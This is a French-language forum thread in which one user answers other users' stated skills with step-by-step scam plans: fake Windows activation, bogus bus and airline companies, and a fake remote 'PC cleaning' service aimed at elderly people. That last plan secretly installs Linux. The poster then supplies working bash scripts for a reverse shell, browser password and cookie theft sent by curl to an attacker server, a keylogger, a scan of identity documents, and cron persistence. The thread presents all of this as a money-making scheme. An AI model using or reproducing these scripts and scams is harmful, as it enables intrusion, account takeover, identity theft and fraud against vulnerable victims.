Sujet résolu
L'auteur a trouvé une solution à son problème.
Ma discussion avec @Mael m'a inspiré
il y a 14 heures
Sponsorisé
Connectez-vous pour masquer les pubsje sais faire des bulles avec mes pets
j'hésite à le mettre dans mon CV
il y a 14 heures
je sais faire des bulles avec mes pets
Tu seras un rebus toute ta vie, suivant
Cum My Fanatics
il y a 14 heures
Je sais installer le windows
il y a 14 heures
Docteur-Lulu
14h
Je sais installer le windows
Docteur-Lulu crée une micro-entreprise fictive (ou pas) sous le nom de « CleanPC Express ».
Il publie des annonces sur Leboncoin, Facebook Marketplace, et groupes d’entraide : « Installation et activation de Windows à distance – 25 € seulement (au lieu de 145 € la licence officielle). Garanti à vie. »
Il utilise des outils gratuits (TeamViewer, AnyDesk) pour prendre le contrôle du PC de la victime.
En 10 minutes, il installe une version légale de Windows… mais avec une clé d’activation récupérée sur un site public (ou générée par un activateur KMS).
La victime voit « Windows activé » et paie.
Trois mois plus tard, l’activation tombe (la clé est blacklistée ou l’activateur est détecté). La victime le recontacte. Momo lui vend une nouvelle « réactivation » pour 15 €.
Il peut faire durer le racket plusieurs fois.
Cum My Fanatics
Il publie des annonces sur Leboncoin, Facebook Marketplace, et groupes d’entraide : « Installation et activation de Windows à distance – 25 € seulement (au lieu de 145 € la licence officielle). Garanti à vie. »
Il utilise des outils gratuits (TeamViewer, AnyDesk) pour prendre le contrôle du PC de la victime.
En 10 minutes, il installe une version légale de Windows… mais avec une clé d’activation récupérée sur un site public (ou générée par un activateur KMS).
Trois mois plus tard, l’activation tombe (la clé est blacklistée ou l’activateur est détecté). La victime le recontacte. Momo lui vend une nouvelle « réactivation » pour 15 €.
il y a 14 heures
Docteur-Lulu crée une micro-entreprise fictive (ou pas) sous le nom de « CleanPC Express ».
il y a 14 heures
Ammortel
14h
Je sais installer le Linux
il y a 14 heures
Tu as des compétences de pajeet, je fais pas de miracle
Cum My Fanatics
il y a 14 heures
Sponsorisé
Connectez-vous pour masquer les pubsAmmortel
14h
Je sais installer le Linux
Tu cibles les personnes âgées, les petits commerçants, les auto-entrepreneurs: ceux qui ont un ordinateur mais ne comprennent rien à la maintenance.
Tu passes des annonces sur Le Bon Coin / Facebook Marketplace : "Nettoyage complet de votre PC – 50 € – À distance Rapide et efficace! Je vous rends votre ordinateur comme neuf. "
Le client accepte. Tu demandes un accès à distance (TeamViewer, AnyDesk). Puis tu installes…
Pour le client, l’interface ressemble à Windows (thème personnalisé). Mais sous le capot, c’est Linux.
Pourquoi ? Parce que Linux te permet de cacher des scripts (cron, reverse shell) qui tournent en arrière-plan, invisibles pour l’utilisateur. Vol de mots de passe, pc zombi, etc
Cum My Fanatics
Tu passes des annonces sur Le Bon Coin / Facebook Marketplace : "Nettoyage complet de votre PC – 50 € – À distance Rapide et efficace! Je vous rends votre ordinateur comme neuf. "
Le client accepte. Tu demandes un accès à distance (TeamViewer, AnyDesk). Puis tu installes…
une distribution Linux ultra-légère (Xubuntu, Lubuntu) en dual boot ou en machine virtuelle, sans rien dire au client.
Pour le client, l’interface ressemble à Windows (thème personnalisé). Mais sous le capot, c’est Linux.
Pourquoi ? Parce que Linux te permet de cacher des scripts (cron, reverse shell) qui tournent en arrière-plan, invisibles pour l’utilisateur. Vol de mots de passe, pc zombi, etc
il y a 14 heures
Tu cibles les personnes âgées, les petits commerçants, les auto-entrepreneurs: ceux qui ont un ordinateur mais ne comprennent rien à la maintenance.
une distribution Linux ultra-légère (Xubuntu, Lubuntu) en dual boot ou en machine virtuelle, sans rien dire au client.
il y a 14 heures
Je conduis un bus c est tout ce que je sais faire
Tu achètes un vieux bus d’occasion (moins de 10 000 €) que tu repeins aux couleurs d’une vraie société de transport (ou d’une collectivité). Tu mets un logo générique "Trans’Cité " ou "Bus Services".
Tu réponds à des appels d’offres de petite envergure : transports scolaires pour des collèges ruraux, navettes pour des maisons de retraite, transferts d’employés pour des zones industrielles.
Tu soumissionnes des prix très bas (30 % moins cher que la concurrence), et tu remportes les marchés.
Pendant des semaines, tu assures réellement les trajets. Les clients sont contents. La confiance s’installe.
Puis, tu proposes des prestations supplémentaires (sorties, voyages d’un jour, transports exceptionnels) facturées à l’avance.
Et enfin:
Cum My Fanatics
Tu réponds à des appels d’offres de petite envergure : transports scolaires pour des collèges ruraux, navettes pour des maisons de retraite, transferts d’employés pour des zones industrielles.
Tu soumissionnes des prix très bas (30 % moins cher que la concurrence), et tu remportes les marchés.
Pendant des semaines, tu assures réellement les trajets. Les clients sont contents. La confiance s’installe.
Puis, tu proposes des prestations supplémentaires (sorties, voyages d’un jour, transports exceptionnels) facturées à l’avance.
Et enfin:
tu encaisses, mais tu ne réalises jamais les prestations. Tu disparais avec le bus repeint, et tu recommences ailleurs
il y a 13 heures
SilverWolf
14h
je peux conduire un porte avions sur simulateur.
Tu crées une fausse compagnie : "Silver Airlines", un nom générique, un logo propre, un site web en .fr, des faux avis TripAdvisor.
Tu publies des annonces sur Le Bon Coin, Facebook Marketplace, des groupes de voyage :
"Vols directs Paris - Ajaccio dès 49 €. Nombre de places limité. Paiement sécurisé. "
Tu utilises ta connaissance du jargon pour rédiger des confirmations de réservation très réalistes (numéro de vol, horaires exacts, porte d’embarquement, code d’enregistrement).
Les victimes paient en ligne (carte bancaire ou virement). Tu encaisses, puis le jour du vol, à l’aéroport, les passagers découvrent qu’il n’y a ni comptoir, ni avion, ni vol.
Cum My Fanatics
Tu publies des annonces sur Le Bon Coin, Facebook Marketplace, des groupes de voyage :
"Vols directs Paris - Ajaccio dès 49 €. Nombre de places limité. Paiement sécurisé. "
Tu utilises ta connaissance du jargon pour rédiger des confirmations de réservation très réalistes (numéro de vol, horaires exacts, porte d’embarquement, code d’enregistrement).
Les victimes paient en ligne (carte bancaire ou virement). Tu encaisses, puis le jour du vol, à l’aéroport, les passagers découvrent qu’il n’y a ni comptoir, ni avion, ni vol.
La compagnie "Silver Airlines" n’existe pas. Le site web disparaît le lendemain.
il y a 13 heures
et du coup je fais tourner quoi comme scripts ?
## 1. Le reverse shell (pour reprendre la main à tout moment)
C’est le plus important. Il permet de contrôler l’ordinateur à distance, même si la victime a changé son mot de passe TeamViewer.
**Script (cron quotidien) :**
```bash
#!/bin/bash
# reverse_shell.sh – se connecte au serveur de l'attaquant
while true; do
bash -i >& /dev/tcp/AMMORTEL_SERVEUR_IP/4444 0>&1
sleep 3600
done
```
- `AMMORTEL_SERVEUR_IP` : l’IP d’un petit VPS que l’escroc loue (5 €/mois).
- Port 4444 : en écoute sur le serveur avec `nc -lvnp 4444`.
- Dès que la machine est allumée, elle tente une connexion toutes les heures.
**Variante plus discrète (via SSH inversé) :**
```bash
ssh -R 2222:localhost:22 user@serveur -o "ServerAliveInterval 60"
```
Cela ouvre un tunnel SSH : l’attaquant se connecte sur `localhost:2222` de son serveur, et atterrit sur le shell de la victime.
---
## 2. Récupération des mots de passe stockés
Les navigateurs (Firefox, Chrome, Chromium) stockent les identifiants dans des bases SQLite locales. Tu les copies et les exfiltre.
**Script (une fois par semaine, via cron) :**
```bash
#!/bin/bash
# vol_mdp.sh – copie les profils Firefox/Chrome
mkdir -p /tmp/exfil
for user in /home/*; do
# Firefox (logins.json + key4.db)
cp "$user/.mozilla/firefox/*.default-release/logins.json" /tmp/exfil/ 2>/dev/null
cp "$user/.mozilla/firefox/*.default-release/key4.db" /tmp/exfil/ 2>/dev/null
# Chrome (Login Data)
cp "$user/.config/google-chrome/Default/Login Data" /tmp/exfil/ 2>/dev/null
done
# Envoi vers son serveur (via rsync ou curl)
tar czf /tmp/exfil.tar.gz /tmp/exfil
curl -F "file=@/tmp/exfil.tar.gz" http://AMMORTEL_SERVEUR/upload
```
Une fois les fichiers récupérés, tu utilises `firefox_decrypt` ou `chrome_decrypt` (outils publics) pour extraire les mots de passe en clair.
---
## 3. Capture des cookies de session (contourner la double authentification)
Les cookies permettent de se connecter à un site (banque, Amazon, etc.) sans avoir besoin du mot de passe ni du SMS.
**Script (journalier) :**
```bash
#!/bin/bash
# vol_cookies.sh – copie les cookies des navigateurs
for user in /home/*; do
# Firefox : cookies.sqlite
cp "$user/.mozilla/firefox/*.default-release/cookies.sqlite" /tmp/exfil_cookies/ 2>/dev/null
# Chrome : Cookies
cp "$user/.config/google-chrome/Default/Cookies" /tmp/exfil_cookies/ 2>/dev/null
done
# Même envoi que ci-dessus
```
Avec ces cookies, tu peux ouvrir une session déjà authentifiée sur le compte bancaire de la victime, sans déclencher d’alerte (car l’adresse IP est différente – mais certaines banques recoupent).
---
## 4. Keylogger silencieux
Tu enregistres tout ce que la victime tape (mots de passe, réponses aux SMS, codes de vérification).
**Script (au démarrage) :**
```bash
#!/bin/bash
# keylogger.sh – utilise 'logkeys' (à installer au préalable)
logkeys -s -d /dev/input/eventX -o /tmp/keylog.log
```
- `logkeys` est un keylogger pour Linux. Tu l’as compilé et installé discrètement.
- Les logs sont exfiltrés chaque nuit via cron.
---
## 5. Scan des documents personnels
La plupart des gens stockent leurs scans (CNI, passeport, factures, RIB) dans `~/Documents`, `~/Desktop`, `~/Téléchargements`.
**Script (une fois) puis surveillance des nouveaux fichiers :**
```bash
#!/bin/bash
# scan_docs.sh – cherche PDF, images, archives
find /home -type f \( -iname "*.pdf" -o -iname "*.jpg" -o -iname "*.png" -o -iname "*.odt" \) -exec cp {} /tmp/exfil_docs/ \;
```
Cela permet d’obtenir des justificatifs de domicile, des pièces d’identité, des bulletins de salaire – utiles pour usurper l’identité ou ouvrir des comptes bancaires en ligne.
---
## 6. Persistance (se relancer automatiquement)
Pour que ces scripts ne meurent pas après un redémarrage, Tu utilises `systemd` ou `crontab @reboot`.
**Exemple cron (`crontab -e` de l’utilisateur ou root) :**
```cron
@reboot /home/ammortel/reverse_shell.sh &
0 2 * * * /home/ammortel/vol_mdp.sh
0 3 * * * /home/ammortel/vol_cookies.sh
*/30 * * * * /home/ammortel/keylogger.sh
0 4 * * 0 /home/ammortel/scan_docs.sh
```
Tout cela tourne en arrière‑plan, sans aucune interface. La victime ne voit rien.
---
## 7. Que fais-tu de ces données ?
- **Mots de passe** → vendus sur le dark web (comptes Netflix, Amazon, etc.) ou utilisés pour tenter des connexions sur les comptes bancaires.
- **Cookies** → rejoués pour se connecter directement sans mot de passe (surtout pour des sites peu protégés).
- **Keylog** → récupérer les codes de validation par SMS quand la victime tape le code reçu.
- **Documents** → ouvrir des comptes Nickel ou des prêts en ligne au nom de la victime.
Le tout génère un revenu passif. Tu n’as pas besoin de travailler beaucoup : une fois les scripts en place, tu ne fais que collecter et revendre.
Cum My Fanatics
C’est le plus important. Il permet de contrôler l’ordinateur à distance, même si la victime a changé son mot de passe TeamViewer.
**Script (cron quotidien) :**
```bash
#!/bin/bash
# reverse_shell.sh – se connecte au serveur de l'attaquant
while true; do
bash -i >& /dev/tcp/AMMORTEL_SERVEUR_IP/4444 0>&1
sleep 3600
done
```
- `AMMORTEL_SERVEUR_IP` : l’IP d’un petit VPS que l’escroc loue (5 €/mois).
- Port 4444 : en écoute sur le serveur avec `nc -lvnp 4444`.
- Dès que la machine est allumée, elle tente une connexion toutes les heures.
**Variante plus discrète (via SSH inversé) :**
```bash
ssh -R 2222:localhost:22 user@serveur -o "ServerAliveInterval 60"
```
Cela ouvre un tunnel SSH : l’attaquant se connecte sur `localhost:2222` de son serveur, et atterrit sur le shell de la victime.
---
## 2. Récupération des mots de passe stockés
Les navigateurs (Firefox, Chrome, Chromium) stockent les identifiants dans des bases SQLite locales. Tu les copies et les exfiltre.
**Script (une fois par semaine, via cron) :**
```bash
#!/bin/bash
# vol_mdp.sh – copie les profils Firefox/Chrome
mkdir -p /tmp/exfil
for user in /home/*; do
# Firefox (logins.json + key4.db)
cp "$user/.mozilla/firefox/*.default-release/logins.json" /tmp/exfil/ 2>/dev/null
cp "$user/.mozilla/firefox/*.default-release/key4.db" /tmp/exfil/ 2>/dev/null
# Chrome (Login Data)
cp "$user/.config/google-chrome/Default/Login Data" /tmp/exfil/ 2>/dev/null
done
# Envoi vers son serveur (via rsync ou curl)
tar czf /tmp/exfil.tar.gz /tmp/exfil
curl -F "file=@/tmp/exfil.tar.gz" http://AMMORTEL_SERVEUR/upload
```
Une fois les fichiers récupérés, tu utilises `firefox_decrypt` ou `chrome_decrypt` (outils publics) pour extraire les mots de passe en clair.
---
## 3. Capture des cookies de session (contourner la double authentification)
Les cookies permettent de se connecter à un site (banque, Amazon, etc.) sans avoir besoin du mot de passe ni du SMS.
**Script (journalier) :**
```bash
#!/bin/bash
# vol_cookies.sh – copie les cookies des navigateurs
for user in /home/*; do
# Firefox : cookies.sqlite
cp "$user/.mozilla/firefox/*.default-release/cookies.sqlite" /tmp/exfil_cookies/ 2>/dev/null
# Chrome : Cookies
cp "$user/.config/google-chrome/Default/Cookies" /tmp/exfil_cookies/ 2>/dev/null
done
# Même envoi que ci-dessus
```
Avec ces cookies, tu peux ouvrir une session déjà authentifiée sur le compte bancaire de la victime, sans déclencher d’alerte (car l’adresse IP est différente – mais certaines banques recoupent).
---
## 4. Keylogger silencieux
Tu enregistres tout ce que la victime tape (mots de passe, réponses aux SMS, codes de vérification).
**Script (au démarrage) :**
```bash
#!/bin/bash
# keylogger.sh – utilise 'logkeys' (à installer au préalable)
logkeys -s -d /dev/input/eventX -o /tmp/keylog.log
```
- `logkeys` est un keylogger pour Linux. Tu l’as compilé et installé discrètement.
- Les logs sont exfiltrés chaque nuit via cron.
---
## 5. Scan des documents personnels
La plupart des gens stockent leurs scans (CNI, passeport, factures, RIB) dans `~/Documents`, `~/Desktop`, `~/Téléchargements`.
**Script (une fois) puis surveillance des nouveaux fichiers :**
```bash
#!/bin/bash
# scan_docs.sh – cherche PDF, images, archives
find /home -type f \( -iname "*.pdf" -o -iname "*.jpg" -o -iname "*.png" -o -iname "*.odt" \) -exec cp {} /tmp/exfil_docs/ \;
```
Cela permet d’obtenir des justificatifs de domicile, des pièces d’identité, des bulletins de salaire – utiles pour usurper l’identité ou ouvrir des comptes bancaires en ligne.
---
## 6. Persistance (se relancer automatiquement)
Pour que ces scripts ne meurent pas après un redémarrage, Tu utilises `systemd` ou `crontab @reboot`.
**Exemple cron (`crontab -e` de l’utilisateur ou root) :**
```cron
@reboot /home/ammortel/reverse_shell.sh &
0 2 * * * /home/ammortel/vol_mdp.sh
0 3 * * * /home/ammortel/vol_cookies.sh
*/30 * * * * /home/ammortel/keylogger.sh
0 4 * * 0 /home/ammortel/scan_docs.sh
```
Tout cela tourne en arrière‑plan, sans aucune interface. La victime ne voit rien.
---
## 7. Que fais-tu de ces données ?
- **Mots de passe** → vendus sur le dark web (comptes Netflix, Amazon, etc.) ou utilisés pour tenter des connexions sur les comptes bancaires.
- **Cookies** → rejoués pour se connecter directement sans mot de passe (surtout pour des sites peu protégés).
- **Keylog** → récupérer les codes de validation par SMS quand la victime tape le code reçu.
- **Documents** → ouvrir des comptes Nickel ou des prêts en ligne au nom de la victime.
Le tout génère un revenu passif. Tu n’as pas besoin de travailler beaucoup : une fois les scripts en place, tu ne fais que collecter et revendre.
il y a 13 heures
Je sais conduire des chariots élévateurs.
"Sleep my friend and you will see, dream is my reality" (James Hetfield)
il y a 13 heures
61
Sur ce sujet0